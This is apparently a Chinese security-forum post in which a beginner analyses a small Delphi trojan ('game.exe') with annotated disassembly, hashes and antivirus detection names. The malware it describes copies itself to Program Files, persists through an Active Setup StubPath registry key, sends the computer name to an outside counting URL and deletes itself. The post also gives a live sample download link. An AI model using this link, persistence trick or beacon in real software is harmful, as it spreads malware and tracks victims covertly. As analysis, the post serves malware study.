File: C:\Documents and Settings\Administrator\桌面\temp\game.exe
Size: 13824 bytes
Modified: 2010年1月22日星期五, 11:08:01
MD5: D80E710C62D064EF6E98694244C5EC22
SHA1: A1BE80A1C215D9CBAFBE54E417B023E4898856CA
CRC32: 9BCAB632
瑞星:Trojan.Win32.Generic.51F7C34C
金山毒霸:Win32.Troj.Scar.13824
卡巴斯基:Trojan.Win32.Scar.bdrm
PESniffer: Borland Delphi 4.0
PEiDDSCAN: Borland Delphi 6.0 - 7.0
样本下载链接:http://www.qqwg.tk/wm/game.exe
0040138C /$ 53 push ebx
0040138D |. 56 push esi
0040138E |. 57 push edi
0040138F |. 81C4 F8FEFFFF add esp, -108
00401395 |. 8BDA mov ebx, edx
00401397 |. 8BF0 mov esi, eax
00401399 |. 8BC3 mov eax, ebx
0040139B |. E8 10080000 call 00401BB0
004013A0 |. 85F6 test esi, esi
004013A2 |. 75 1E jnz short 004013C2
004013A4 |. 68 05010000 push 105 ; /BufSize = 105 (261.)
004013A9 |. 8D4424 04 lea eax, dword ptr [esp+4] ; |
004013AD |. 50 push eax ; |PathBuffer = 0012FE80
004013AE |. 6A 00 push 0 ; |hModule = NULL
004013B0 |. E8 7FFCFFFF call <jmp.&kernel32.GetModuleFileName>; \获取自身路径
004013B5 |. 8BC8 mov ecx, eax
004013B7 |. 8BD4 mov edx, esp
004013B9 |. 8BC3 mov eax, ebx
004013BB |. E8 B4080000 call 00401C74
004013C0 |. EB 1E jmp short 004013E0
004013C2 |> E8 95FCFFFF call <jmp.&kernel32.GetCommandLineA> ; [GetCommandLineA
004013C7 |. 8BF8 mov edi, eax
004013C9 |> 8BD3 /mov edx, ebx
004013CB |. 8BC7 |mov eax, edi
004013CD |. E8 CEFEFFFF |call 004012A0
004013D2 |. 8BF8 |mov edi, eax
004013D4 |. 85F6 |test esi, esi
004013D6 |. 74 08 |je short 004013E0
004013D8 |. 833B 00 |cmp dword ptr [ebx], 0
004013DB |. 74 03 |je short 004013E0
004013DD |. 4E |dec esi
004013DE |.^ EB E9 \jmp short 004013C9
004013E0 |> 81C4 08010000 add esp, 108
004013E6 |. 5F pop edi
004013E7 |. 5E pop esi
004013E8 |. 5B pop ebx
004013E9 \. C3 retn
00402418 /$ 55 push ebp
00402419 |. 8BEC mov ebp, esp
0040241B |. 8B45 10 mov eax, dword ptr [ebp+10]
0040241E |. 50 push eax ; /MutexName = "TestD"
0040241F |. 837D 0C 01 cmp dword ptr [ebp+C], 1 ; |
00402423 |. 1BC0 sbb eax, eax ; |game.00402FA0
00402425 |. 40 inc eax ; |
00402426 |. 83E0 7F and eax, 7F ; |
00402429 |. 50 push eax ; |InitialOwner = TRUE
0040242A |. 8B45 08 mov eax, dword ptr [ebp+8] ; |
0040242D |. 50 push eax ; |pSecurity = NULL
0040242E |. E8 DDFFFFFF call <jmp.&kernel32.CreateMutexA> ; \创建一个名为TestD的互斥体
00402433 |. 5D pop ebp ; 0012FF98
00402434 \. C2 0C00 retn 0C
00402E14 /$ 53 push ebx
00402E15 |. 56 push esi
00402E16 |. 51 push ecx
00402E17 |. 8BF0 mov esi, eax
00402E19 |. C70424 FF0000>mov dword ptr [esp], 0FF
00402E20 |. 8B0424 mov eax, dword ptr [esp]
00402E23 |. E8 04E3FFFF call 0040112C
00402E28 |. 8BD8 mov ebx, eax
00402E2A |. 54 push esp ; /pBufferSize = 0012FF70
00402E2B |. 53 push ebx ; |Buffer = 001583E0
00402E2C |. E8 0FF6FFFF call <jmp.&kernel32.GetComputerNameA> ; \检索当前计算机名称
00402E31 |. 8BC6 mov eax, esi
00402E33 |. 8BD3 mov edx, ebx ; ASCII "9117ECDD07004EB"
00402E35 |. E8 7AEEFFFF call 00401CB4
00402E3A |. 8BC3 mov eax, ebx
00402E3C |. E8 03E3FFFF call 00401144
00402E41 |. 5A pop edx
00402E42 |. 5E pop esi
00402E43 |. 5B pop ebx
00402E44 \. C3 retn
00402DDC /$ 53 push ebx
00402DDD |. 56 push esi
00402DDE |. 8BF0 mov esi, eax ; ASCII "http://www.qqwg.tk/tj/Count.asp?mac=9117ECDD07004EB"
00402DE0 |. 6A 00 push 0
00402DE0 |. 6A 00 push 0
00402DE2 |. 6A 00 push 0
00402DE4 |. 6A 00 push 0
00402DE6 |. 6A 00 push 0
00402DE8 |. 68 102E4000 push 00402E10
00402DED |. E8 3AFFFFFF call <jmp.&wininet.InternetOpenA>
00402DF2 |. 8BD8 mov ebx, eax
00402DF4 |. 6A 00 push 0
00402DF6 |. 6A 00 push 0
00402DF8 |. 6A 00 push 0
00402DFA |. 6A 00 push 0
00402DFC |. 8BC6 mov eax, esi ; ASCII "http://www.qqwg.tk/tj/Count.asp?mac=9117ECDD07004EB"
00402DFE |. E8 35F0FFFF call 00401E38
00402E03 |. 50 push eax
00402E04 |. 53 push ebx
00402E05 |. E8 2AFFFFFF call <jmp.&wininet.InternetOpenUrlA> ; 通过在http://www.qqwg.tk/tj/Count.asp?mac后挂靠计算机名来统计中毒数量
00402E0A |. 5E pop esi ; ASCII "http://www.qqwg.tk/tj/Count.asp?mac=9117ECDD07004EB"
00402E0B |. 5B pop ebx
00402E0C \. C3 retn
00402FBC /$ 55 push ebp
00402FBD |. 8BEC mov ebp, esp
00402FBF |. 83C4 F4 add esp, -0C
00402FC2 |. 53 push ebx
00402FC3 |. 56 push esi
00402FC4 |. 894D F8 mov dword ptr [ebp-8], ecx
00402FC7 |. 8955 FC mov dword ptr [ebp-4], edx
00402FCA |. 8BF0 mov esi, eax
00402FCC |. 8B45 FC mov eax, dword ptr [ebp-4]
00402FCF |. E8 54EEFFFF call 00401E28
00402FD4 |. 8B45 F8 mov eax, dword ptr [ebp-8]
00402FD7 |. E8 4CEEFFFF call 00401E28
00402FDC |. 8B45 08 mov eax, dword ptr [ebp+8]
00402FDF |. E8 44EEFFFF call 00401E28
00402FE4 |. 33C0 xor eax, eax
00402FE6 |. 55 push ebp
00402FE7 |. 68 61304000 push 00403061
00402FEC |. 64:FF30 push dword ptr fs:[eax]
00402FEF |. 64:8920 mov dword ptr fs:[eax], esp
00402FF2 |. 33DB xor ebx, ebx
00402FF4 |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402FF7 |. 50 push eax
00402FF8 |. 8B45 FC mov eax, dword ptr [ebp-4]
00402FFB |. E8 38EEFFFF call 00401E38
00403000 |. 50 push eax ; |Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}"
00403001 |. 56 push esi ; |hKey = HKEY_LOCAL_MACHINE
00403002 |. E8 E9F3FFFF call <jmp.&advapi32.RegCreateKeyA> ; \创建注册表键值
00403007 |. 8B45 08 mov eax, dword ptr [ebp+8]
0040300A |. E8 D5ECFFFF call 00401CE4
0040300F |. 50 push eax
00403010 |. 8B45 08 mov eax, dword ptr [ebp+8]
00403013 |. E8 20EEFFFF call 00401E38
00403018 |. 50 push eax
00403019 |. 6A 02 push 2
0040301B |. 6A 00 push 0
0040301D |. 8B45 F8 mov eax, dword ptr [ebp-8]
00403020 |. E8 13EEFFFF call 00401E38
00403025 |. 50 push eax ; |ValueName = "StubPath"
00403026 |. 8B45 F4 mov eax, dword ptr [ebp-C] ; |
00403029 |. 50 push eax ; |hKey = 90
0040302A |. E8 D1F3FFFF call <jmp.&advapi32.RegSetValueExA> ; \写值
0040302F |. 85C0 test eax, eax
00403031 |. 75 02 jnz short 00403035
00403033 |. B3 01 mov bl, 1
00403035 |> 8B45 F4 mov eax, dword ptr [ebp-C]
00403038 |. 50 push eax ; /hKey = 00000090 (window)
00403039 |. E8 AAF3FFFF call <jmp.&advapi32.RegCloseKey> ; \关闭
0040303E |. 33C0 xor eax, eax
00403040 |. 5A pop edx
00403041 |. 59 pop ecx
00403042 |. 59 pop ecx
00403043 |. 64:8910 mov dword ptr fs:[eax], edx
00403046 |. 68 68304000 push 00403068
0040304B |> 8D45 F8 lea eax, dword ptr [ebp-8]
0040304E |. BA 02000000 mov edx, 2
00403053 |. E8 7CEBFFFF call 00401BD4
00403058 |. 8D45 08 lea eax, dword ptr [ebp+8]
0040305B |. E8 50EBFFFF call 00401BB0
00403060 \. C3 retn
004033EC >/$ 55 push ebp
004033ED |. 8BEC mov ebp, esp
004033EF |. 83C4 EC add esp, -14
004033F2 |. 33C0 xor eax, eax
004033F4 |. 8945 EC mov dword ptr [ebp-14], eax
004033F7 |. B8 9C334000 mov eax, 0040339C
004033FC |. E8 27EFFFFF call 00402328
00403401 |. 33C0 xor eax, eax
00403403 |. 55 push ebp
00403404 |. 68 7B344000 push 0040347B
00403409 |. 64:FF30 push dword ptr fs:[eax]
0040340C |. 64:8920 mov dword ptr fs:[eax], esp
0040340F |. 6A FF push -1
00403411 |. 68 88344000 push 00403488 ; ASCII "C:\Program Files\Ma0ya0.exe"
00403416 |. 8D55 EC lea edx, dword ptr [ebp-14]
00403419 |. 33C0 xor eax, eax
0040341B |. E8 6CDFFFFF call 0040138C
00403420 |. 8B45 EC mov eax, dword ptr [ebp-14]
00403423 |. E8 10EAFFFF call 00401E38
00403428 |. 50 push eax ; |ExistingFileName = "C:\Documents and Settings\Administrator\",D7,"烂鎈game.exe"
00403429 |. E8 DAEFFFFF call <jmp.&kernel32.CopyFileA> ; \将自身复制到%ProgramFiles%,并重命名为Ma0ya0.exe
堆栈
0012FF94 00158388 |ExistingFileName = "C:\Documents and Settings\Administrator\",D7,"烂鎈temp\game.exe"
0012FF98 00403488 |NewFileName = "C:\Program Files\Ma0ya0.exe"
0012FF9C FFFFFFFF \FailIfExists = TRUE
0040342E |. 68 AC344000 push 004034AC ; ASCII "C:\Program Files\Ma0ya0.exe"
00403433 |. B9 D0344000 mov ecx, 004034D0 ; ASCII "StubPath"
00403438 |. BA E4344000 mov edx, 004034E4 ; ASCII "SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}"
0040343D |. B8 02000080 mov eax, 80000002
00403442 |. E8 75FBFFFF call 00402FBC
00403447 |. 68 40354000 push 00403540 ; /Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}"
0040344C |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00403451 |. E8 A2EFFFFF call <jmp.&advapi32.RegDeleteKeyA> ; \删除注册表键值
00403350 /$ E8 E3FDFFFF call 00403138
00403355 |. 6A 00 push 0 ; /ShowState = SW_HIDE
00403357 |. 68 64334000 push 00403364 ; |CmdLine = "_deleteme.bat"
0040335C |. E8 FFF0FFFF call <jmp.&kernel32.WinExec> ; \隐藏运行批处理,删除自身
00403361 \. C3 retn
第一次分析,恳请路过大牛不吝赐教
[注意]看雪招聘,专注安全领域的专业人才平台!
